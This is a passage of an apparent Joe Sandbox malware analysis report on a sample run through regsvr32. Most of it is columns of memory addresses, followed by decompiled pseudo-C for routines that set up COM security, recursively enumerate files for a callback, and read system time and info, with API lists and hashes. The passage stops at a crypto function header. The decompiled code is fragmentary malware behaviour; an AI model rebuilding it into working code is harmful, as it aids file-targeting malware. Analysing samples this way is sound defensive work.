                                                                                                                                                                                              0x049a6a51
                                                                                                                                                                                              0x049a6a51
                                                                                                                                                                                              0x049a6a55
                                                                                                                                                                                              0x049a6a55
                                                                                                                                                                                              0x049a6a4d
                                                                                                                                                                                              0x049a6a3d
                                                                                                                                                                                              0x049a6a01
                                                                                                                                                                                              0x049a6a03
                                                                                                                                                                                              0x049a6a05
                                                                                                                                                                                              0x049a6a0b
                                                                                                                                                                                              0x049a6a0f
                                                                                                                                                                                              0x049a6a0f
                                                                                                                                                                                              0x049a6a0f
                                                                                                                                                                                              0x049a6a13
                                                                                                                                                                                              0x049a6a13
                                                                                                                                                                                              0x049a6a0b
                                                                                                                                                                                              0x049a6a6d
                                                                                                                                                                                              0x049a6a6f
                                                                                                                                                                                              0x049a6a6f
                                                                                                                                                                                              0x049a6a6f
                                                                                                                                                                                              0x049a6a71
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6a71
                                                                                                                                                                                              0x049a6956
                                                                                                                                                                                              0x049a6958
                                                                                                                                                                                              0x049a695d
                                                                                                                                                                                              0x049a6965
                                                                                                                                                                                              0x049a6968
                                                                                                                                                                                              0x049a696b
                                                                                                                                                                                              0x049a6971
                                                                                                                                                                                              0x049a6971
                                                                                                                                                                                              0x049a6971
                                                                                                                                                                                              0x049a6973
                                                                                                                                                                                              0x049a6987
                                                                                                                                                                                              0x049a6987
                                                                                                                                                                                              0x049a698c
                                                                                                                                                                                              0x049a698e
                                                                                                                                                                                              0x049a6991
                                                                                                                                                                                              0x049a6994
                                                                                                                                                                                              0x049a6997
                                                                                                                                                                                              0x049a699a
                                                                                                                                                                                              0x049a699d
                                                                                                                                                                                              0x049a699d
                                                                                                                                                                                              0x049a699d
                                                                                                                                                                                              0x049a699d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a697f
                                                                                                                                                                                              0x049a6919
                                                                                                                                                                                              0x049a691f
                                                                                                                                                                                              0x049a6921
                                                                                                                                                                                              0x049a6923
                                                                                                                                                                                              0x049a6928
                                                                                                                                                                                              0x049a692a
                                                                                                                                                                                              0x049a692a
                                                                                                                                                                                              0x049a6934
                                                                                                                                                                                              0x049a6936
                                                                                                                                                                                              0x049a6938
                                                                                                                                                                                              0x049a693a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a693a
                                                                                                                                                                                              0x049a688c
                                                                                                                                                                                              0x049a688c
                                                                                                                                                                                              0x049a6cf8
                                                                                                                                                                                              0x049a6cff
                                                                                                                                                                                              0x049a6d01
                                                                                                                                                                                              0x049a6d01
                                                                                                                                                                                              0x049a6d03
                                                                                                                                                                                              0x049a6d09
                                                                                                                                                                                              0x049a6d0c
                                                                                                                                                                                              0x049a6d0f
                                                                                                                                                                                              0x049a6d14
                                                                                                                                                                                              0x049a6d16
                                                                                                                                                                                              0x049a6d19
                                                                                                                                                                                              0x049a6d1c
                                                                                                                                                                                              0x049a6d1e
                                                                                                                                                                                              0x049a6d26
                                                                                                                                                                                              0x049a6d2a
                                                                                                                                                                                              0x049a6d2c
                                                                                                                                                                                              0x049a6d30
                                                                                                                                                                                              0x049a6d38
                                                                                                                                                                                              0x049a6d38
                                                                                                                                                                                              0x049a6d3c
                                                                                                                                                                                              0x049a6d45
                                                                                                                                                                                              0x049a6d4d
                                                                                                                                                                                              0x049a6d4f
                                                                                                                                                                                              0x049a6d52
                                                                                                                                                                                              0x049a6d55
                                                                                                                                                                                              0x049a6d55
                                                                                                                                                                                              0x049a6d59
                                                                                                                                                                                              0x049a6d5c
                                                                                                                                                                                              0x049a6d62
                                                                                                                                                                                              0x049a6d75
                                                                                                                                                                                              0x049a6d64
                                                                                                                                                                                              0x049a6d69
                                                                                                                                                                                              0x049a6d69
                                                                                                                                                                                              0x049a6d78
                                                                                                                                                                                              0x049a6d7e
                                                                                                                                                                                              0x049a6d97
                                                                                                                                                                                              0x049a6d80
                                                                                                                                                                                              0x049a6d88
                                                                                                                                                                                              0x049a6d88
                                                                                                                                                                                              0x049a6d9d
                                                                                                                                                                                              0x049a6da2
                                                                                                                                                                                              0x049a6da2
                                                                                                                                                                                              0x049a67f5
                                                                                                                                                                                              0x049a67f6
                                                                                                                                                                                              0x049a67f7
                                                                                                                                                                                              0x049a67f8
                                                                                                                                                                                              0x049a67f9
                                                                                                                                                                                              0x049a67fd
                                                                                                                                                                                              0x049a6804
                                                                                                                                                                                              0x049a6805
                                                                                                                                                                                              0x049a6806
                                                                                                                                                                                              0x049a6807
                                                                                                                                                                                              0x049a6809
                                                                                                                                                                                              0x049a684f
                                                                                                                                                                                              0x049a684f
                                                                                                                                                                                              0x049a6859
                                                                                                                                                                                              0x049a6859
                                                                                                                                                                                              0x049a685a
                                                                                                                                                                                              0x049a685b
                                                                                                                                                                                              0x049a685c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a685c
                                                                                                                                                                                              0x049a680d
                                                                                                                                                                                              0x049a6815
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6827
                                                                                                                                                                                              0x049a682c
                                                                                                                                                                                              0x049a6837
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6843
                                                                                                                                                                                              0x049a6843
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6843
                                                                                                                                                                                              0x049a6837
                                                                                                                                                                                              0x049a6815
                                                                                                                                                                                              0x049a6a7c
                                                                                                                                                                                              0x049a6a7e
                                                                                                                                                                                              0x049a6a81
                                                                                                                                                                                              0x049a6a83
                                                                                                                                                                                              0x049a6a87
                                                                                                                                                                                              0x049a6a8a
                                                                                                                                                                                              0x049a6a8f
                                                                                                                                                                                              0x049a6a92
                                                                                                                                                                                              0x049a6a95
                                                                                                                                                                                              0x049a6a9c
                                                                                                                                                                                              0x049a6a9c
                                                                                                                                                                                              0x049a6aa2
                                                                                                                                                                                              0x049a6aa4
                                                                                                                                                                                              0x049a6aa7
                                                                                                                                                                                              0x049a6aaa
                                                                                                                                                                                              0x049a6aad
                                                                                                                                                                                              0x049a6ab0
                                                                                                                                                                                              0x049a6ab3
                                                                                                                                                                                              0x049a6ab3
                                                                                                                                                                                              0x049a6ab6
                                                                                                                                                                                              0x049a6ab9
                                                                                                                                                                                              0x049a6abc
                                                                                                                                                                                              0x049a6abf
                                                                                                                                                                                              0x049a6ac2
                                                                                                                                                                                              0x049a6ac2
                                                                                                                                                                                              0x049a6ac5
                                                                                                                                                                                              0x049a6ac8
                                                                                                                                                                                              0x049a6acc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6ae9
                                                                                                                                                                                              0x049a6aee
                                                                                                                                                                                              0x049a6bd6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6bdf
                                                                                                                                                                                              0x049a6be2
                                                                                                                                                                                              0x049a6bee
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6bee
                                                                                                                                                                                              0x049a6af4
                                                                                                                                                                                              0x049a6af7
                                                                                                                                                                                              0x049a6af9
                                                                                                                                                                                              0x049a6afc
                                                                                                                                                                                              0x049a6aff
                                                                                                                                                                                              0x049a6b02
                                                                                                                                                                                              0x049a6b0b
                                                                                                                                                                                              0x049a6b0b
                                                                                                                                                                                              0x049a6b0d
                                                                                                                                                                                              0x049a6b13
                                                                                                                                                                                              0x049a6b15
                                                                                                                                                                                              0x049a6b18
                                                                                                                                                                                              0x049a6b1b
                                                                                                                                                                                              0x049a6b1e
                                                                                                                                                                                              0x049a6b21
                                                                                                                                                                                              0x049a6b24
                                                                                                                                                                                              0x049a6b24
                                                                                                                                                                                              0x049a6b2b
                                                                                                                                                                                              0x049a6b2e
                                                                                                                                                                                              0x049a6b31
                                                                                                                                                                                              0x049a6b34
                                                                                                                                                                                              0x049a6b37
                                                                                                                                                                                              0x049a6b37
                                                                                                                                                                                              0x049a6b3c
                                                                                                                                                                                              0x049a6b3f
                                                                                                                                                                                              0x049a6b41
                                                                                                                                                                                              0x049a6b46
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6bfa
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6c03
                                                                                                                                                                                              0x049a6c06
                                                                                                                                                                                              0x049a6c16
                                                                                                                                                                                              0x049a6c16
                                                                                                                                                                                              0x049a6b4c
                                                                                                                                                                                              0x049a6b4f
                                                                                                                                                                                              0x049a6bab
                                                                                                                                                                                              0x049a6b65
                                                                                                                                                                                              0x049a6b65
                                                                                                                                                                                              0x049a6b6b
                                                                                                                                                                                              0x049a6b71
                                                                                                                                                                                              0x049a6c22
                                                                                                                                                                                              0x049a6c26
                                                                                                                                                                                              0x049a6c28
                                                                                                                                                                                              0x049a6c2e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6c34
                                                                                                                                                                                              0x049a6c3b
                                                                                                                                                                                              0x049a6c5d
                                                                                                                                                                                              0x049a6c63
                                                                                                                                                                                              0x049a6c8f
                                                                                                                                                                                              0x049a6c93
                                                                                                                                                                                              0x049a6c95
                                                                                                                                                                                              0x049a6c97
                                                                                                                                                                                              0x049a6c97
                                                                                                                                                                                              0x049a6c97
                                                                                                                                                                                              0x049a6c9b
                                                                                                                                                                                              0x049a6c9b
                                                                                                                                                                                              0x049a6c65
                                                                                                                                                                                              0x049a6c6b
                                                                                                                                                                                              0x049a6c6d
                                                                                                                                                                                              0x049a6c71
                                                                                                                                                                                              0x049a6c73
                                                                                                                                                                                              0x049a6c75
                                                                                                                                                                                              0x049a6c75
                                                                                                                                                                                              0x049a6c75
                                                                                                                                                                                              0x049a6c77
                                                                                                                                                                                              0x049a6c7b
                                                                                                                                                                                              0x049a6c81
                                                                                                                                                                                              0x049a6c83
                                                                                                                                                                                              0x049a6c85
                                                                                                                                                                                              0x049a6c85
                                                                                                                                                                                              0x049a6c85
                                                                                                                                                                                              0x049a6c89
                                                                                                                                                                                              0x049a6c89
                                                                                                                                                                                              0x049a6c81
                                                                                                                                                                                              0x049a6c71
                                                                                                                                                                                              0x049a6c3d
                                                                                                                                                                                              0x049a6c3f
                                                                                                                                                                                              0x049a6c43
                                                                                                                                                                                              0x049a6c45
                                                                                                                                                                                              0x049a6c47
                                                                                                                                                                                              0x049a6c47
                                                                                                                                                                                              0x049a6c47
                                                                                                                                                                                              0x049a6c4b
                                                                                                                                                                                              0x049a6c4b
                                                                                                                                                                                              0x049a6c43
                                                                                                                                                                                              0x049a6c9d
                                                                                                                                                                                              0x049a6c9f
                                                                                                                                                                                              0x049a6c9f
                                                                                                                                                                                              0x049a6c9f
                                                                                                                                                                                              0x049a6ca1
                                                                                                                                                                                              0x049a6ca5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6ca5
                                                                                                                                                                                              0x049a6b7b
                                                                                                                                                                                              0x049a6b7d
                                                                                                                                                                                              0x049a6b82
                                                                                                                                                                                              0x049a6b8a
                                                                                                                                                                                              0x049a6b8d
                                                                                                                                                                                              0x049a6b90
                                                                                                                                                                                              0x049a6b96
                                                                                                                                                                                              0x049a6b96
                                                                                                                                                                                              0x049a6b96
                                                                                                                                                                                              0x049a6b98
                                                                                                                                                                                              0x049a6b9c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6bb3
                                                                                                                                                                                              0x049a6bb3
                                                                                                                                                                                              0x049a6bb6
                                                                                                                                                                                              0x049a6bb8
                                                                                                                                                                                              0x049a6bbb
                                                                                                                                                                                              0x049a6bbe
                                                                                                                                                                                              0x049a6bc1
                                                                                                                                                                                              0x049a6bc4
                                                                                                                                                                                              0x049a6bc7
                                                                                                                                                                                              0x049a6bc7
                                                                                                                                                                                              0x049a6bc7
                                                                                                                                                                                              0x049a6bc9
                                                                                                                                                                                              0x049a6ad2
                                                                                                                                                                                              0x049a6ad6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6ad6
                                                                                                                                                                                              0x049a6bab
                                                                                                                                                                                              0x049a6b51
                                                                                                                                                                                              0x049a6b54
                                                                                                                                                                                              0x049a6b57
                                                                                                                                                                                              0x049a6b5a
                                                                                                                                                                                              0x049a6b63
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6b63
                                                                                                                                                                                              0x049a6ace
                                                                                                                                                                                              0x049a6ad1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6adc
                                                                                                                                                                                              0x049a6adc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6ae2

                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                                                                                                                                              • API String ID: 0-3089872807
                                                                                                                                                                                              • Opcode ID: e66e452a4e1a414fed629f3f5c566b1a1cc9717cafb32c0c3207f734a6b0df38
                                                                                                                                                                                              • Instruction ID: 6ef3acb0d17c0a45443955ebb2beffe6beefbcdb2d08ffa8653fcf0924dc6410
                                                                                                                                                                                              • Opcode Fuzzy Hash: e66e452a4e1a414fed629f3f5c566b1a1cc9717cafb32c0c3207f734a6b0df38
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C12CF32A083518FDB15CE28C59422ABBE2EB84354F0D8A3DE9D597B41E375BD68C781
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499E400 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E0499E400(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x49ac868, 0, 1, 0x49ac878, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E04998BDE(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                                              0x0499e40d
                                                                                                                                                                                              0x0499e410
                                                                                                                                                                                              0x0499e413
                                                                                                                                                                                              0x0499e424
                                                                                                                                                                                              0x0499e42a
                                                                                                                                                                                              0x0499e43b
                                                                                                                                                                                              0x0499e443
                                                                                                                                                                                              0x0499e494
                                                                                                                                                                                              0x0499e494
                                                                                                                                                                                              0x0499e499
                                                                                                                                                                                              0x0499e49e
                                                                                                                                                                                              0x0499e49e
                                                                                                                                                                                              0x0499e4a1
                                                                                                                                                                                              0x0499e4a6
                                                                                                                                                                                              0x0499e4ab
                                                                                                                                                                                              0x0499e4ab
                                                                                                                                                                                              0x0499e4ae
                                                                                                                                                                                              0x0499e445
                                                                                                                                                                                              0x0499e446
                                                                                                                                                                                              0x0499e44c
                                                                                                                                                                                              0x0499e45d
                                                                                                                                                                                              0x0499e462
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499e464
                                                                                                                                                                                              0x0499e471
                                                                                                                                                                                              0x0499e479
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499e47b
                                                                                                                                                                                              0x0499e47d
                                                                                                                                                                                              0x0499e485
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499e487
                                                                                                                                                                                              0x0499e48a
                                                                                                                                                                                              0x0499e490
                                                                                                                                                                                              0x0499e490
                                                                                                                                                                                              0x0499e485
                                                                                                                                                                                              0x0499e479
                                                                                                                                                                                              0x0499e462
                                                                                                                                                                                              0x0499e4b3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E413
                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E424
                                                                                                                                                                                              • CoCreateInstance.OLE32(049AC868,00000000,00000001,049AC878,?,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E43B
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499E446
                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E471
                                                                                                                                                                                                • Part of subcall function 04998BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1610782348-0
                                                                                                                                                                                              • Opcode ID: e3b128f616da0566a431f75d355bcc992de7f528397aed0049bba2cea8dd78a2
                                                                                                                                                                                              • Instruction ID: 9ec6c9cadd000473b60b26cb585f71881e5be6f5e5475cdaa4f2dc9f77b8688f
                                                                                                                                                                                              • Opcode Fuzzy Hash: e3b128f616da0566a431f75d355bcc992de7f528397aed0049bba2cea8dd78a2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C21E970A00245BFEB249B6BDC4DE5BBFBCEFC6F15F10456CB505AA290D674AA00CA61
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499BCFC Relevance: 3.1, APIs: 2, Instructions: 105fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                              			E0499BCFC(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E04999A5A(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E04998BF4( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0499BCD4( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push(0x49ac9a0);
						_t60 = E04999A5A(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x49af818; // 0x4bdf8b0
							 *((intOrPtr*)(_t54 + 0xc0))(1);
							_push(1);
							_push(1);
							_push(0);
							E0499BCFC(_t60, _t75, 1, 5, E049A0015, _a16);
							_t63 = _t63 + 0x1c;
							E04998BF4( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_t7 = _t61 + 0x49af924; // 0x0
						_push( *_t7);
						_push( &(_v608.cFileName));
						_t41 =  *0x49af824; // 0x4bdfb78
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E049A0015(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x49af818; // 0x4bdf8b0
						 *((intOrPtr*)(_t46 + 0xc0))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x49af818; // 0x4bdf8b0
				 *((intOrPtr*)(_t31 + 0x80))(_t59);
				goto L14;
			}



















                                                                                                                                                                                              0x0499bcfc
                                                                                                                                                                                              0x0499bd08
                                                                                                                                                                                              0x0499bd0a
                                                                                                                                                                                              0x0499bd0c
                                                                                                                                                                                              0x0499bd12
                                                                                                                                                                                              0x0499bd17
                                                                                                                                                                                              0x0499bd1a
                                                                                                                                                                                              0x0499bd1f
                                                                                                                                                                                              0x0499be3b
                                                                                                                                                                                              0x0499be3b
                                                                                                                                                                                              0x0499bd33
                                                                                                                                                                                              0x0499bd38
                                                                                                                                                                                              0x0499be2a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499bd3e
                                                                                                                                                                                              0x0499bd3e
                                                                                                                                                                                              0x0499bd4b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499bd59
                                                                                                                                                                                              0x0499bdac
                                                                                                                                                                                              0x0499bdac
                                                                                                                                                                                              0x0499bdb4
                                                                                                                                                                                              0x0499bdb5
                                                                                                                                                                                              0x0499bdc0
                                                                                                                                                                                              0x0499bdc2
                                                                                                                                                                                              0x0499bdc5
                                                                                                                                                                                              0x0499bdca
                                                                                                                                                                                              0x0499bdcc
                                                                                                                                                                                              0x0499bdd4
                                                                                                                                                                                              0x0499bdda
                                                                                                                                                                                              0x0499bddc
                                                                                                                                                                                              0x0499bdde
                                                                                                                                                                                              0x0499bdf3
                                                                                                                                                                                              0x0499bdf8
                                                                                                                                                                                              0x0499be01
                                                                                                                                                                                              0x0499be07
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499bdca
                                                                                                                                                                                              0x0499bd5b
                                                                                                                                                                                              0x0499bd5d
                                                                                                                                                                                              0x0499bd5d
                                                                                                                                                                                              0x0499bd5d
                                                                                                                                                                                              0x0499bd69
                                                                                                                                                                                              0x0499bd6a
                                                                                                                                                                                              0x0499bd74
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499bd81
                                                                                                                                                                                              0x0499bd86
                                                                                                                                                                                              0x0499bd8b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499bd8d
                                                                                                                                                                                              0x0499bd94
                                                                                                                                                                                              0x0499bd9a
                                                                                                                                                                                              0x0499bd9a
                                                                                                                                                                                              0x0499bd9d
                                                                                                                                                                                              0x0499bdaa
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499be08
                                                                                                                                                                                              0x0499be16
                                                                                                                                                                                              0x0499be1e
                                                                                                                                                                                              0x0499be24
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 0499BD2D
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0499BE10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$FirstNext
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1690352074-0
                                                                                                                                                                                              • Opcode ID: 2b23bef37c80e474509dc36535b478034cf238d2589b49af7f630e5ea8f093df
                                                                                                                                                                                              • Instruction ID: 3feaecef5d0c634618c795506d3a72ce192991c4a75335cd9dac6487ef30ce92
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b23bef37c80e474509dc36535b478034cf238d2589b49af7f630e5ea8f093df
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E31C672A002196FEF209AACAC49FAA37ECFB80714F040174E515AA1C1EA75BD51CBE5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499A065 Relevance: 1.5, APIs: 1, Instructions: 24timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,049952C8), ref: 0499A072
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Time$FileSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2086374402-0
                                                                                                                                                                                              • Opcode ID: 3d4a05ff6ae29f31bc1f8751253104523d60e111600e63597a5c9bcae7d6a96f
                                                                                                                                                                                              • Instruction ID: 71f0be36a0a026d992cacf99c9c9c68bc46184d362637ae408db7982d72fbddd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d4a05ff6ae29f31bc1f8751253104523d60e111600e63597a5c9bcae7d6a96f
                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E01AB69003187FDB10EE689905A9ABAACEBC0A14F114964AC45A7244E670AE0886D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499DD62 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499DD62(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}





                                                                                                                                                                                              0x0499dd6a
                                                                                                                                                                                              0x0499dd75
                                                                                                                                                                                              0x0499dd80
                                                                                                                                                                                              0x0499dd6c
                                                                                                                                                                                              0x0499dd6e
                                                                                                                                                                                              0x0499dd70
                                                                                                                                                                                              0x0499dd70

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0499E13B), ref: 0499DD75
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                              • Opcode ID: ebe463642fe0c9c20a21f5462aeae9f484ff59ca7ccbeed5f584edbd589ca605
                                                                                                                                                                                              • Instruction ID: 14f141acaaeb5216a9ca6a71295c69a72711a5f71cf99d132d89a0be167b6edf
                                                                                                                                                                                              • Opcode Fuzzy Hash: ebe463642fe0c9c20a21f5462aeae9f484ff59ca7ccbeed5f584edbd589ca605
                                                                                                                                                                                              • Instruction Fuzzy Hash: 17C022E1A0020906CF0097A561566AA32FC6B04208F2005A0E802F0080E550EC4082A0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A8240 Relevance: .4, Instructions: 359COMMONCrypto
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 99%
